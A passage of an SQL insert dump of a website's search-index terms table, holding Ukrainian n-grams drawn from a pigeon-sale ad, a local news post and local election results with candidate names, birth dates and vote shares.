поштових',0,1,1.5333,'м000',1,'*'),(1621231,'молодих поштових 2020','молодих поштових 2020',0,1,1.7,'м000',1,'*'),(1621232,'наявності 20','наявності 20',0,1,1.4,'н000',1,'*'),(1621233,'наявності 20 штук','наявності 20 штук',0,1,1.5667,'н000',1,'*'),(1621234,'поштові голуби','поштові голуби',0,1,1.4667,'п000',3,'*'),(1621235,'поштових','поштових',0,0,0.5333,'п000',2,'*'),(1621236,'поштових 2020','поштових 2020',0,1,1.4333,'п000',1,'*'),(1621237,'поштових 2020 року','поштових 2020 року',0,1,1.6,'п000',1,'*'),(1621238,'телефонуйте 0508320922','телефонуйте 0508320922',0,1,1.7333,'т000',5,'*'),(1621239,'телефонуйте 0508320922 домовимось','телефонуйте 0508320922 домовимось',0,1,2,'т000',5,'*'),(1621240,'хмільник','хмільник',0,0,0.5333,'х000',3,'*'),(1621241,'хмільник телефонуйте','хмільник телефонуйте',0,1,1.6667,'х000',1,'*'),(1621242,'хмільник телефонуйте 0508320922','хмільник телефонуйте 0508320922',0,1,2,'х000',1,'*'),(1621243,'штук','штук',0,0,0.2667,'ш000',1,'*'),(1621244,'штук молодих','штук молодих',0,1,1.4,'ш000',1,'*'),(1621245,'штук молодих поштових','штук молодих поштових',0,1,1.7,'ш000',1,'*'),(1623502,'100 телефонуйте','100 телефонуйте',0,1,1.5,'т000',2,'*'),(1623503,'100 телефонуйте 0508320922','100 телефонуйте 0508320922',0,1,1.8667,'т000',2,'*'),(1623504,'20 року','20 року',0,1,1.2333,'р000',3,'*'),(1623505,'20 року так','20 року так',0,1,1.3667,'р000',1,'*'),(1623506,'2488','2488',0,0,0.4,'',1,'*'),(1623507,'є птиця','є птиця',0,1,1.2333,'є000',2,'*'),(1623508,'є птиця 20','є птиця 20',0,1,1.3333,'є000',1,'*'),(1623509,'і минулих','і минулих',0,1,1.3,'і000',2,'*'),(1623510,'і минулих років','і минулих років',0,1,1.5,'і000',2,'*'),(1623511,'в наявності є','в наявності є',0,1,1.4333,'в000',3,'*'),(1623512,'вінницю овруч ціна','вінницю овруч ціна',0,1,1.6,'в000',2,'*'),(1623513,'минулих','минулих',0,0,0.4667,'м000',2,'*'),(1623514,'минулих років','минулих років',0,1,1.4333,'м000',2,'*'),(1623515,'минулих років є','минулих років є',0,1,1.5,'м000',1,'*'),(1623516,'наявності є','наявності є',0,1,1.3667,'н000',3,'*'),(1623517,'наявності є птиця','наявності є птиця',0,1,1.5667,'н000',2,'*'),(1623518,'овруч ціна 100','овруч ціна 100',0,1,1.4667,'о000',1,'*'),(1623519,'птиця','птиця',0,0,0.3333,'п000',2,'*'),(1623520,'птиця 20','птиця 20',0,1,1.2667,'п000',1,'*'),(1623521,'птиця 20 року','птиця 20 року',0,1,1.4333,'п000',1,'*'),(1623522,'років є','років є',0,1,1.2333,'р000',1,'*'),(1623523,'років є можливість','років є можливість',0,1,1.6,'р000',1,'*'),(1623524,'року так','року так',0,1,1.2667,'р000',3,'*'),(1623525,'року так і','року так і',0,1,1.3333,'р000',2,'*'),(1623526,'так і','так і',0,1,1.1667,'т000',2,'*'),(1623527,'так і минулих','так і минулих',0,1,1.4333,'т000',2,'*'),(1623528,'ціна 100','ціна 100',0,1,1.2667,'ц000',2,'*'),(1623529,'ціна 100 телефонуйте','ціна 100 телефонуйте',0,1,1.6667,'ц000',2,'*'),(1623626,'20 roku','20 roku',0,1,1.2333,'R200',1,'*'),(1623627,'2489','2489',0,0,0.4,'',1,'*'),(1623628,'300','300',0,0,0.3,'',2,'*'),(1623629,'300 телефонуйте','300 телефонуйте',0,1,1.5,'т000',1,'*'),(1623630,'300 телефонуйте 0508320922','300 телефонуйте 0508320922',0,1,1.8667,'т000',1,'*'),(1623631,'kingi','kingi',0,0,0.3333,'K520',1,'*'),(1623632,'kingi 20','kingi 20',0,1,1.2667,'K520',1,'*'),(1623633,'kingi 20 roku','kingi 20 roku',0,1,1.4333,'K5262',1,'*'),(1623634,'є два','є два',0,1,1.1667,'є000',1,'*'),(1623635,'є два молодих','є два молодих',0,1,1.4333,'є000',1,'*'),(1623636,'два','два',0,0,0.2,'д000',1,'*'),(1623637,'два молодих','два молодих',0,1,1.3667,'д000',1,'*'),(1623638,'два молодих кінга','два молодих кінга',0,1,1.5667,'д000',1,'*'),(1623639,'кінга','кінга',0,0,0.3333,'к000',2,'*'),(1623640,'кінга є','кінга є',0,1,1.2333,'к000',1,'*'),(1623641,'кінга є можливість','кінга є можливість',0,1,1.6,'к000',1,'*'),(1623642,'кінги','кінги',0,0,0.3333,'к000',1,'*'),(1623643,'кінги 20','кінги 20',0,1,1.2667,'к000',1,'*'),(1623644,'кінги 20 року','кінги 20 року',0,1,1.4333,'к000',1,'*'),(1623645,'молодих кінга','молодих кінга',0,1,1.4333,'м000',1,'*'),(1623646,'молодих кінга є','молодих кінга є',0,1,1.5,'м000',1,'*'),(1623647,'наявності є два','наявності є два',0,1,1.5,'н000',1,'*'),(1623648,'овруч ціна 300','овруч ціна 300',0,1,1.4667,'о000',1,'*'),(1623649,'ціна 300','ціна 300',0,1,1.2667,'ц000',2,'*'),(1623650,'ціна 300 телефонуйте','ціна 300 телефонуйте',0,1,1.6667,'ц000',1,'*'),(1623720,'11601','11601',0,0,0.5,'',1,'*'),(1623814,'2490','2490',0,0,0.4,'',1,'*'),(1623815,'dni','dni',0,0,0.2,'D500',1,'*'),(1623816,'dni v','dni v',0,1,1.1667,'D510',1,'*'),(1623817,'dni v malini','dni v malini',0,1,1.4,'D51545',1,'*'),(1623818,'malini','malini',0,0,0.4,'M450',1,'*'),(1623819,'osinni','osinni',0,0,0.4,'O250',1,'*'),(1623820,'osinni dni','osinni dni',0,1,1.3333,'O2535',1,'*'),(1623821,'osinni dni v','osinni dni v',0,1,1.4,'O25351',1,'*'),(1623822,'ostanni','ostanni',0,0,0.4667,'O235',2,'*'),(1623823,'ostanni osinni','ostanni osinni',0,1,1.4667,'O23525',1,'*'),(1623824,'ostanni osinni dni','ostanni osinni dni',0,1,1.6,'O2352535',1,'*'),(1623825,'v malini','v malini',0,1,1.2667,'V545',1,'*'),(1623826,'в малині','в малині',0,1,1.2667,'в000',1,'*'),(1623827,'дні','дні',0,0,0.2,'д000',2,'*'),(1623828,'дні в','дні в',0,1,1.1667,'д000',1,'*'),(1623829,'дні в малині','дні в малині',0,1,1.4,'д000',1,'*'),(1623830,'малині','малині',0,0,0.4,'м000',1,'*'),(1623831,'осінні','осінні',0,0,0.4,'о000',1,'*'),(1623832,'осінні дні','осінні дні',0,1,1.3333,'о000',1,'*'),(1623833,'осінні дні в','осінні дні в',0,1,1.4,'о000',1,'*'),(1623834,'останні','останні',0,0,0.4667,'о000',2,'*'),(1623835,'останні осінні','останні осінні',0,1,1.4667,'о000',1,'*'),(1623836,'останні осінні дні','останні осінні дні',0,1,1.6,'о000',1,'*'),(1625892,'0 відомості','0 відомості',0,1,1.3667,'в000',1,'*'),(1625893,'0 відомості про','0 відомості про',0,1,1.5,'в000',1,'*'),(1625894,'0 політична','0 політична',0,1,1.3667,'п000',1,'*'),(1625895,'0 політична партія','0 політична партія',0,1,1.6,'п000',1,'*'),(1625896,'01.02.1970','01.02.1970',0,0,1,'',1,'*'),(1625897,'01.02.1970 р','01.02.1970 р',0,1,1.4,'р000',1,'*'),(1625898,'01.02.1970 р освіта','01.02.1970 р освіта',0,1,1.6333,'р000',1,'*'),(1625899,'02.07.1970','02.07.1970',0,0,1,'',1,'*'),(1625900,'02.07.1970 р','02.07.1970 р',0,1,1.4,'р000',1,'*'),(1625901,'02.07.1970 р освіта','02.07.1970 р освіта',0,1,1.6333,'р000',1,'*'),(1625902,'04.05.1981','04.05.1981',0,0,1,'',1,'*'),(1625903,'04.05.1981 р','04.05.1981 р',0,1,1.4,'р000',1,'*'),(1625904,'04.05.1981 р освіта','04.05.1981 р освіта',0,1,1.6333,'р000',1,'*'),(1625905,'05.04.1976','05.04.1976',0,0,1,'',1,'*'),(1625906,'05.04.1976 р','05.04.1976 р',0,1,1.4,'р000',1,'*'),(1625907,'05.04.1976 р освіта','05.04.1976 р освіта',0,1,1.6333,'р000',1,'*'),(1625908,'05.05.1992','05.05.1992',0,0,1,'',1,'*'),(1625909,'05.05.1992 р','05.05.1992 р',0,1,1.4,'р000',1,'*'),(1625910,'05.05.1992 р освіта','05.05.1992 р освіта',0,1,1.6333,'р000',1,'*'),(1625911,'05.08.1958','05.08.1958',0,0,1,'',1,'*'),(1625912,'05.08.1958 р','05.08.1958 р',0,1,1.4,'р000',1,'*'),(1625913,'05.08.1958 р освіта','05.08.1958 р освіта',0,1,1.6333,'р000',1,'*'),(1625914,'06.01.1982','06.01.1982',0,0,1,'',1,'*'),(1625915,'06.01.1982 р','06.01.1982 р',0,1,1.4,'р000',1,'*'),(1625916,'06.01.1982 р освіта','06.01.1982 р освіта',0,1,1.6333,'р000',1,'*'),(1625917,'08.07.1973','08.07.1973',0,0,1,'',1,'*'),(1625918,'08.07.1973 р','08.07.1973 р',0,1,1.4,'р000',1,'*'),(1625919,'08.07.1973 р освіта','08.07.1973 р освіта',0,1,1.6333,'р000',1,'*'),(1625920,'08.11.1968','08.11.1968',0,0,1,'',1,'*'),(1625921,'08.11.1968 р','08.11.1968 р',0,1,1.4,'р000',1,'*'),(1625922,'08.11.1968 р освіта','08.11.1968 р освіта',0,1,1.6333,'р000',1,'*'),(1625923,'09.08.1981','09.08.1981',0,0,1,'',1,'*'),(1625924,'09.08.1981 р','09.08.1981 р',0,1,1.4,'р000',1,'*'),(1625925,'09.08.1981 р освіта','09.08.1981 р освіта',0,1,1.6333,'р000',1,'*'),(1625926,'1 1 карпенко','1 1 карпенко',0,1,1.4,'к000',1,'*'),(1625927,'1 1 лукашенко','1 1 лукашенко',0,1,1.4333,'л000',1,'*'),(1625928,'1 1 ситайло','1 1 ситайло',0,1,1.3667,'с000',1,'*'),(1625929,'1 2','1 2',0,1,1.1,'',1,'*'),(1625930,'1 2 костюченко','1 2 костюченко',0,1,1.4667,'к000',1,'*'),(1625931,'1 2 мельник','1 2 мельник',0,1,1.3667,'м000',1,'*'),(1625932,'1 2 сербін','1 2 сербін',0,1,1.3333,'с000',1,'*'),(1625933,'1 гуцалюк','1 гуцалюк',0,1,1.3,'г000',1,'*'),(1625934,'1 гуцалюк ольга','1 гуцалюк ольга',0,1,1.5,'г000',1,'*'),(1625935,'1 карпенко','1 карпенко',0,1,1.3333,'к000',1,'*'),(1625936,'1 карпенко сергій','1 карпенко сергій',0,1,1.5667,'к000',1,'*'),(1625937,'1 кисельчук','1 кисельчук',0,1,1.3667,'к000',1,'*'),(1625938,'1 кисельчук дмитрій','1 кисельчук дмитрій',0,1,1.6333,'к000',1,'*'),(1625939,'1 лукашенко','1 лукашенко',0,1,1.3667,'л000',1,'*'),(1625940,'1 лукашенко віталій','1 лукашенко віталій',0,1,1.6333,'л000',1,'*'),(1625941,'1 майстренко','1 майстренко',0,1,1.4,'м000',1,'*'),(1625942,'1 майстренко василь','1 майстренко василь',0,1,1.6333,'м000',1,'*'),(1625943,'1 приходько','1 приходько',0,1,1.3667,'п000',1,'*'),(1625944,'1 приходько ольга','1 приходько ольга',0,1,1.5667,'п000',1,'*'),(1625945,'1 ситайло','1 ситайло',0,1,1.3,'с000',1,'*'),(1625946,'1 ситайло олександр','1 ситайло олександр',0,1,1.6333,'с000',1,'*'),(1625947,'1 сніцаренко','1 сніцаренко',0,1,1.4,'с000',1,'*'),(1625948,'1 сніцаренко леся','1 сніцаренко леся',0,1,1.5667,'с000',1,'*'),(1625949,'1 старжинський','1 старжинський',0,1,1.4667,'с000',1,'*'),(1625950,'1 старжинський ігор','1 старжинський ігор',0,1,1.6333,'с000',1,'*'),(1625951,'1 столяр','1 столяр',0,1,1.2667,'с000',1,'*'),(1625952,'1 столяр олександр','1 столяр олександр',0,1,1.6,'с000',1,'*'),(1625953,'1 хоменко','1 хоменко',0,1,1.3,'х000',1,'*'),(1625954,'1 хоменко віктор','1 хоменко віктор',0,1,1.5333,'х000',1,'*'),(1625955,'100 33,89','100 33,89',0,1,1.3,'',1,'*'),(1625956,'100 33,89 1','100 33,89 1',0,1,1.3667,'',1,'*'),(1625957,'102','102',0,0,0.3,'',1,'*'),(1625958,'102 0','102 0',0,1,1.1667,'',1,'*'),(1625959,'102 0 політична','102 0 політична',0,1,1.5,'п000',1,'*'),(1625960,'106','106',0,0,0.3,'',1,'*'),(1625961,'106 35,93','106 35,93',0,1,1.3,'',1,'*'),(1625962,'106 35,93 1','106 35,93 1',0,1,1.3667,'',1,'*'),(1625963,'11,18','11,18',0,0,0.5,'',1,'*'),(1625964,'11,18 єбво','11,18 єбво',0,1,1.3333,'є000',1,'*'),(1625965,'11,18 єбво 2','11,18 єбво 2',0,1,1.4,'є000',1,'*'),(1625966,'11.05.1991','11.05.1991',0,0,1,'',1,'*'),(1625967,'11.05.1991 р','11.05.1991 р',0,1,1.4,'р000',1,'*'),(1625968,'11.05.1991 р освіта','11.05.1991 р освіта',0,1,1.6333,'р000',1,'*'),(1625969,'11.76','11.76',0,0,0.5,'',1,'*'),(1625970,'11.76 політична','11.76 політична',0,1,1.5,'п000',1,'*'),(1625971,'11.76 політична партія','11.76 політична партія',0,1,1.7333,'п000',1,'*'),(1625972,'11.76 тво','11.76 тво',0,1,1.3,'т000',1,'*'),(1625973,'11.76 тво за','11.76 тво за',0,1,1.4,'т000',1,'*'),(1625974,'111','111',0,0,0.3,'',1,'*'),(1625975,'111 37,62','111 37,62',0,1,1.3,'',1,'*'),(1625976,'111 37,62 1','111 37,62 1',0,1,1.3667,'',1,'*'),(1625977,'1157','1157',0,0,0.4,'',1,'*'),(1625978,'1157 5','1157 5',0,1,1.2,'',1,'*'),(1625979,'1157 5 політична','1157 5 політична',0,1,1.5333,'п000',1,'*'),(1625980,'12,54','12,54',0,0,0.5,'',1,'*'),(1625981,'12,54 єбво','12,54 єбво',0,1,1.3333,'є000',1,'*'),(1625982,'12,54 єбво 2','12,54 єбво 2',0,1,1.4,'є000',1,'*'),(1625983,'123','123',0,0,0.3,'',1,'*'),(1625984,'123 41,69','123 41,69',0,1,1.3,'',1,'*'),(1625985,'123 41,69 2','123 41,69 2',0,1,1.3667,'',1,'*'),(1625986,'1252','1252',0,0,0.4,'',1,'*'),(1625987,'1252 5','1252 5',0,1,1.2,'',1,'*'),(1625988,'1252 5 політична','1252 5 політична',0,1,1.5333,'п000',1,'*'),(1625989,'13,22','13,22',0,0,0.5,'',1,'*'),(1625990,'13,22 2','13,22 2',0,1,1.2333,'',1,'*'),(1625991,'132 44,74','132 44,74',0,1,1.3,'',1,'*'),(1625992,'132 44,74 1','132 44,74 1',0,1,1.3667,'',1,'*'),(1625993,'132 44,74 2','132 44,74 2',0,1,1.3667,'',1,'*'),(1625994,'14.08.1976','14.08.1976',0,0,1,'',1,'*'),(1625995,'14.08.1976 р','14.08.1976 р',0,1,1.4,'р000',1,'*'),(1625996,'14.08.1976 р освіта','14.08.1976 р освіта',0,1,1.6333,'р000',1,'*'),(1625997,'14.12.1967','14.12.1967',0,0,1,'',1,'*'),(1625998,'14.12.1967 р','14.12.1967 р',0,1,1.4,'р000',1,'*'),(1625999,'14.12.1967 р освіта','14.12.1967 р освіта',0,1,1.6333,'р000',1,'*'),(1626000,'14.71','14.71',0,0,0.5,'',1,'*'),(1626001,'14.71 політична','14.71 політична',0,1,1.5,'п000',1,'*'),(1626002,'14.71 політична партія','14.71 політична партія',0,1,1.7333,'п000',1,'*'),(1626003,'15,59','15,59',0,0,0.5,'',1,'*'),(1626004,'15,59 єбво','15,59 єбво',0,1,1.3333,'є000',1,'*'),(1626005,'15,59 єбво 1','15,59 єбво 1',0,1,1.4,'є000',1,'*'),(1626006,'154','154',0,0,0.3,'',1,'*'),(1626007,'154 0','154 0',0,1,1.1667,'',1,'*'),(1626008,'154 0 політична','154 0 політична',0,1,1.5,'п000',1,'*'),(1626009,'16 47.06','16 47.06',0,1,1.2667,'',1,'*'),(1626010,'16 47.06 політична','16 47.06 політична',0,1,1.6,'п000',1,'*'),(1626011,'16 політична','16 політична',0,1,1.4,'п000',1,'*'),(1626012,'16 політична партія','16 політична партія',0,1,1.6333,'п000',1,'*'),(1626013,'16,27','16,27',0,0,0.5,'',1,'*'),(1626014,'16,27 єбво','16,27 єбво',0,1,1.3333,'є000',1,'*'),(1626015,'16,27 єбво 1','16,27 єбво 1',0,1,1.4,'є000',1,'*'),(1626016,'16,27 єбво 2','16,27 єбво 2',0,1,1.4,'є000',1,'*'),(1626017,'16.04.1969','16.04.1969',0,0,1,'',1,'*'),(1626018,'16.04.1969 р','16.04.1969 р',0,1,1.4,'р000',1,'*'),(1626019,'16.04.1969 р освіта','16.04.1969 р освіта',0,1,1.6333,'р000',1,'*'),(1626020,'16.05.1967','16.05.1967',0,0,1,'',1,'*'),(1626021,'16.05.1967 р','16.05.1967 р',0,1,1.4,'р000',1,'*'),(1626022,'16.05.1967 р освіта','16.05.1967 р освіта',0,1,1.6333,'р000',1,'*'),(1626023,'163','163',0,0,0.3,'',1,'*'),(1626024,'163 55,25','163 55,25',0,1,1.3,'',1,'*'),(1626025,'163 55,25 2','163 55,25 2',0,1,1.3667,'',1,'*'),(1626026,'164','164',0,0,0.3,'',1,'*'),(1626027,'164 55,59','164 55,59',0,1,1.3,'',1,'*'),(1626028,'164 55,59 1','164 55,59 1',0,1,1.3667,'',1,'*'),(1626029,'17.02.1969','17.02.1969',0,0,1,'',1,'*'),(1626030,'17.02.1969 р','17.02.1969 р',0,1,1.4,'р000',1,'*'),(1626031,'17.02.1969 р освіта','17.02.1969 р освіта',0,1,1.6333,'р000',1,'*'),(1626032,'17.07.1979','17.07.1979',0,0,1,'',1,'*'),(1626033,'17.07.1979 р','17.07.1979 р',0,1,1.4,'р000',1,'*'),(1626034,'17.07.1979 р освіта','17.07.1979 р освіта',0,1,1.6333,'р000',1,'*'),(1626035,'17.08.1986','17.08.1986',0,0,1,'',1,'*'),(1626036,'17.08.1986 р','17.08.1986 р',0,1,1.4,'р000',1,'*'),(1626037,'17.08.1986 р освіта','17.08.1986 р освіта',0,1,1.6333,'р000',1,'*'),(1626038,'178,64','178,64',0,0,0.6,'',1,'*'),(1626039,'178,64 1','178,64 1',0,1,1.2667,'',1,'*'),(1626040,'178,64 1 2','178,64 1 2',0,1,1.3333,'',1,'*'),(1626041,'186','186',0,0,0.3,'',1,'*'),(1626042,'186 0','186 0',0,1,1.1667,'',1,'*'),(1626043,'186 0 політична','186 0 політична',0,1,1.5,'п000',1,'*'),(1626044,'19.06.1975','19.06.1975',0,0,1,'',1,'*'),(1626045,'19.06.1975 р','19.06.1975 р',0,1,1.4,'р000',1,'*'),(1626046,'19.06.1975 р освіта','19.06.1975 р освіта',0,1,1.6333,'р000',1,'*'),(1626047,'19.10.1966','19.10.1966',0,0,1,'',1,'*'),(1626048,'19.10.1966 р','19.10.1966 р',0,1,1.4,'р000',1,'*'),(1626049,'19.10.1966 р освіта','19.10.1966 р освіта',0,1,1.6333,'р000',1,'*'),(1626050,'190','190',0,0,0.3,'',1,'*'),(1626051,'190 0','190 0',0,1,1.1667,'',1,'*'),(1626052,'190 0 політична','190 0 політична',0,1,1.5,'п000',1,'*'),(1626053,'2 2','2 2',0,1,1.1,'',1,'*'),(1626054,'2 2 лісовський','2 2 лісовський',0,1,1.4667,'л000',1,'*'),(1626055,'2 2 сафранчук','2 2 сафранчук',0,1,1.4333,'с000',1,'*'),(1626056,'2 3','2 3',0,1,1.1,'',1,'*'),(1626057,'2 3 ліпей','2 3 ліпей',0,1,1.3,'л000',1,'*'),(1626058,'2 3 малегус','2 3 малегус',0,1,1.3667,'м000',1,'*'),(1626059,'2 бенчук','2 бенчук',0,1,1.2667,'б000',1,'*'),(1626060,'2 бенчук андрій','2 бенчук андрій',0,1,1.5,'б000',1,'*'),(1626061,'2 войтюк','2 войтюк',0,1,1.2667,'в000',1,'*'),(1626062,'2 войтюк оксана','2 войтюк оксана',0,1,1.5,'в000',1,'*'),(1626063,'2 грищенко','2 грищенко',0,1,1.3333,'г000',1,'*'),(1626064,'2 грищенко вячеслав','2 грищенко вячеслав',0,1,1.6333,'г000',1,'*'),(1626065,'2 костюченко','2 костюченко',0,1,1.4,'к000',1,'*'),(1626066,'2 костюченко лариса','2 костюченко лариса',0,1,1.6333,'к000',1,'*'),(1626067,'2 лісовський','2 лісовський',0,1,1.4,'л000',1,'*'),(1626068,'2 лісовський юрій','2 лісовський юрій',0,1,1.5667,'л000',1,'*'),(1626069,'2 політична','2 політична',0,1,1.3667,'п000',1,'*'),(1626070,'2 політична партія','2 політична партія',0,1,1.6,'п000',1,'*'),(1626071,'2 рудицька','2 рудицька',0,1,1.3333,'р000',1,'*'),(1626072,'2 рудицька олеся','2 рудицька олеся',0,1,1.5333,'р000',1,'*'),(1626073,'2 сафранчук','2 сафранчук',0,1,1.3667,'с000',1,'*'),(1626074,'2 сафранчук сергій','2 сафранчук сергій',0,1,1.6,'с000',1,'*'),(1626075,'2 сербін','2 сербін',0,1,1.2667,'с000',1,'*'),(1626076,'2 сербін валентин','2 сербін валентин',0,1,1.5667,'с000',1,'*'),(1626077,'20 6,77','20 6,77',0,1,1.2333,'',1,'*'),(1626078,'20 6,77 єбво','20 6,77 єбво',0,1,1.4,'є000',1,'*'),(1626079,'20,00','20,00',0,0,0.5,'',1,'*'),(1626080,'20,00 єбво','20,00 єбво',0,1,1.3333,'є000',1,'*'),(1626081,'20,00 єбво політична','20,00 єбво політична',0,1,1.6667,'є000',1,'*'),(1626082,'20,67','20,67',0,0,0.5,'',1,'*'),(1626083,'20,67 єбво','20,67 єбво',0,1,1.3333,'є000',1,'*'),(1626084,'20,67 єбво політична','20,67 єбво політична',0,1,1.6667,'є000',1,'*'),(1626085,'20.06.1977','20.06.1977',0,0,1,'',1,'*'),(1626086,'20.06.1977 р','20.06.1977 р',0,1,1.4,'р000',1,'*'),(1626087,'20.06.1977 р освіта','20.06.1977 р освіта',0,1,1.6333,'р000',1,'*'),(1626088,'20.11.1967','20.11.1967',0,0,1,'',1,'*'),(1626089,'20.11.1967 р','20.11.1967 р',0,1,1.4,'р000',1,'*'),(1626090,'20.11.1967 р освіта','20.11.1967 р освіта',0,1,1.6333,'р000',1,'*'),(1626091,'201','201',0,0,0.3,'',1,'*'),(1626092,'201 68,13','201 68,13',0,1,1.3,'',1,'*'),(1626093,'201 68,13 4','201 68,13 4',0,1,1.3667,'',1,'*'),(1626094,'207','207',0,0,0.3,'',1,'*'),(1626095,'207 70,16','207 70,16',0,1,1.3,'',1,'*'),(1626096,'207 70,16 3','207 70,16 3',0,1,1.3667,'',1,'*'),(1626097,'21.07.1982','21.07.1982',0,0,1,'',1,'*'),(1626098,'21.07.1982 р','21.07.1982 р',0,1,1.4,'р000',1,'*'),(1626099,'21.07.1982 р освіта','21.07.1982 р освіта',0,1,1.6333,'р000',1,'*'),(1626100,'21.10.1972','21.10.1972',0,0,1,'',1,'*'),(1626101,'21.10.1972 р','21.10.1972 р',0,1,1.4,'р000',1,'*'),(1626102,'21.10.1972 р освіта','21.10.1972 р освіта',0,1,1.6333,'р000',1,'*'),(1626103,'215','215',0,0,0.3,'',1,'*'),(1626104,'215 72,88','215 72,88',0,1,1.3,'',1,'*'),(1626105,'215 72,88 3','215 72,88 3',0,1,1.3667,'',1,'*'),(1626106,'217','217',0,0,0.3,'',1,'*'),(1626107,'217 73,55','217 73,55',0,1,1.3,'',1,'*'),(1626108,'217 73,55 3','217 73,55 3',0,1,1.3667,'',1,'*'),(1626109,'22,71','22,71',0,0,0.5,'',1,'*'),(1626110,'22,71 2','22,71 2',0,1,1.2333,'',1,'*'),(1626111,'22,71 2 політична','22,71 2 політична',0,1,1.5667,'п000',1,'*'),(1626112,'23.11.1962','23.11.1962',0,0,1,'',1,'*'),(1626113,'23.11.1962 р','23.11.1962 р',0,1,1.4,'р000',1,'*'),(1626114,'23.11.1962 р освіта','23.11.1962 р освіта',0,1,1.6333,'р000',1,'*'),(1626115,'233','233',0,0,0.3,'',1,'*'),(1626116,'233 78,98','233 78,98',0,1,1.3,'',1,'*'),(1626117,'233 78,98 4','233 78,98 4',0,1,1.3667,'',1,'*'),(1626118,'237','237',0,0,0.3,'',1,'*'),(1626119,'237 80,33','237 80,33',0,1,1.3,'',1,'*'),(1626120,'237 80,33 4','237 80,33 4',0,1,1.3667,'',1,'*'),(1626121,'2487','2487',0,0,0.4,'',1,'*'),(1626122,'26','26',0,0,0.2,'',1,'*'),(1626123,'26 8,81','26 8,81',0,1,1.2333,'',1,'*'),(1626124,'26 8,81 єбво','26 8,81 єбво',0,1,1.4,'є000',1,'*'),(1626125,'26.06.1958','26.06.1958',0,0,1,'',1,'*'),(1626126,'26.06.1958 р','26.06.1958 р',0,1,1.4,'р000',1,'*'),(1626127,'26.06.1958 р освіта','26.06.1958 р освіта',0,1,1.6333,'р000',1,'*'),(1626128,'28.01.1977','28.01.1977',0,0,1,'',1,'*'),(1626129,'28.01.1977 р','28.01.1977 р',0,1,1.4,'р000',1,'*'),(1626130,'28.01.1977 р освіта','28.01.1977 р освіта',0,1,1.6333,'р000',1,'*'),(1626131,'28.08.1962','28.08.1962',0,0,1,'',1,'*'),(1626132,'28.08.1962 р','28.08.1962 р',0,1,1.4,'р000',1,'*'),(1626133,'28.08.1962 р освіта','28.08.1962 р освіта',0,1,1.6333,'р000',1,'*'),(1626134,'28.09.1971','28.09.1971',0,0,1,'',1,'*'),(1626135,'28.09.1971 р','28.09.1971 р',0,1,1.4,'р000',1,'*'),(1626136,'28.09.1971 р освіта','28.09.1971 р освіта',0,1,1.6333,'р000',1,'*'),(1626137,'28.12.1974','28.12.1974',0,0,1,'',1,'*'),(1626138,'28.12.1974 р','28.12.1974 р',0,1,1.4,'р000',1,'*'),(1626139,'28.12.1974 р освіта','28.12.1974 р освіта',0,1,1.6333,'р000',1,'*'),(1626140,'29.05.1986','29.05.1986',0,0,1,'',1,'*'),(1626141,'29.05.1986 р','29.05.1986 р',0,1,1.4,'р000',1,'*'),(1626142,'29.05.1986 р освіта','29.05.1986 р освіта',0,1,1.6333,'р000',1,'*'),(1626143,'29.08.1984','29.08.1984',0,0,1,'',1,'*'),(1626144,'29.08.1984 р','29.08.1984 р',0,1,1.4,'р000',1,'*'),(1626145,'29.08.1984 р освіта','29.08.1984 р освіта',0,1,1.6333,'р000',1,'*'),(1626146,'3 3','3 3',0,1,1.1,'',1,'*'),(1626147,'3 3 євдокименко','3 3 євдокименко',0,1,1.5,'є000',1,'*'),(1626148,'3 3 кашиця','3 3 кашиця',0,1,1.3333,'к000',1,'*'),(1626149,'3 4','3 4',0,1,1.1,'',1,'*'),(1626150,'3 4 савченко','3 4 савченко',0,1,1.4,'с000',1,'*'),(1626151,'3 євдокименко','3 євдокименко',0,1,1.4333,'є000',1,'*'),(1626152,'3 євдокименко валерій','3 євдокименко валерій',0,1,1.7,'є000',1,'*'),(1626153,'3 кашиця','3 кашиця',0,1,1.2667,'к000',1,'*'),(1626154,'3 кашиця в\'ячеслав','3 кашиця в',0,1,1.6,'к000',1,'*'),(1626155,'3 ліпей','3 ліпей',0,1,1.2333,'л000',1,'*'),(1626156,'3 ліпей надія','3 ліпей надія',0,1,1.4333,'л000',1,'*'),(1626157,'3 лазарчук','3 лазарчук',0,1,1.3333,'л000',1,'*'),(1626158,'3 лазарчук людмила','3 лазарчук людмила',0,1,1.6,'л000',1,'*'),(1626159,'3 малегус','3 малегус',0,1,1.3,'м000',1,'*'),(1626160,'3 малегус ігор','3 малегус ігор',0,1,1.4667,'м000',1,'*'),(1626161,'31.08.1987','31.08.1987',0,0,1,'',1,'*'),(1626162,'31.08.1987 р','31.08.1987 р',0,1,1.4,'р000',1,'*'),(1626163,'31.08.1987 р освіта','31.08.1987 р освіта',0,1,1.6333,'р000',1,'*'),(1626164,'32,88','32,88',0,0,0.5,'',1,'*'),(1626165,'32,88 2','32,88 2',0,1,1.2333,'',1,'*'),(1626166,'32,88 2 3','32,88 2 3',0,1,1.3,'',1,'*'),(1626167,'329','329',0,0,0.3,'',1,'*'),(1626168,'329 0','329 0',0,1,1.1667,'',1,'*'),(1626169,'329 0 політична','329 0 політична',0,1,1.5,'п000',1,'*'),(1626170,'33 11,18','33 11,18',0,1,1.2667,'',1,'*'),(1626171,'33 11,18 єбво','33 11,18 єбво',0,1,1.4333,'є000',1,'*'),(1626172,'33,89','33,89',0,0,0.5,'',1,'*'),(1626173,'33,89 1','33,89 1',0,1,1.2333,'',1,'*'),(1626174,'33,89 1 1','33,89 1 1',0,1,1.3,'',1,'*'),(1626175,'34 кількість','34 кількість',0,1,1.4,'к000',1,'*'),(1626176,'34 кількість обраних','34 кількість обраних',0,1,1.6667,'к000',1,'*'),(1626177,'35,93','35,93',0,0,0.5,'',1,'*'),(1626178,'35,93 1','35,93 1',0,1,1.2333,'',1,'*'),(1626179,'35,93 1 2','35,93 1 2',0,1,1.3,'',1,'*'),(1626180,'37','37',0,0,0.2,'',1,'*'),(1626181,'37 12,54','37 12,54',0,1,1.2667,'',1,'*'),(1626182,'37 12,54 єбво','37 12,54 єбво',0,1,1.4333,'є000',1,'*'),(1626183,'37,62','37,62',0,0,0.5,'',1,'*'),(1626184,'37,62 1','37,62 1',0,1,1.2333,'',1,'*'),(1626185,'37,62 1 2','37,62 1 2',0,1,1.3,'',1,'*'),(1626186,'376','376',0,0,0.3,'',1,'*'),(1626187,'376 0','376 0',0,1,1.1667,'',1,'*'),(1626188,'376 0 політична','376 0 політична',0,1,1.5,'п000',1,'*'),(1626189,'39','39',0,0,0.2,'',1,'*'),(1626190,'39 13,22','39 13,22',0,1,1.2667,'',1,'*'),(1626191,'39 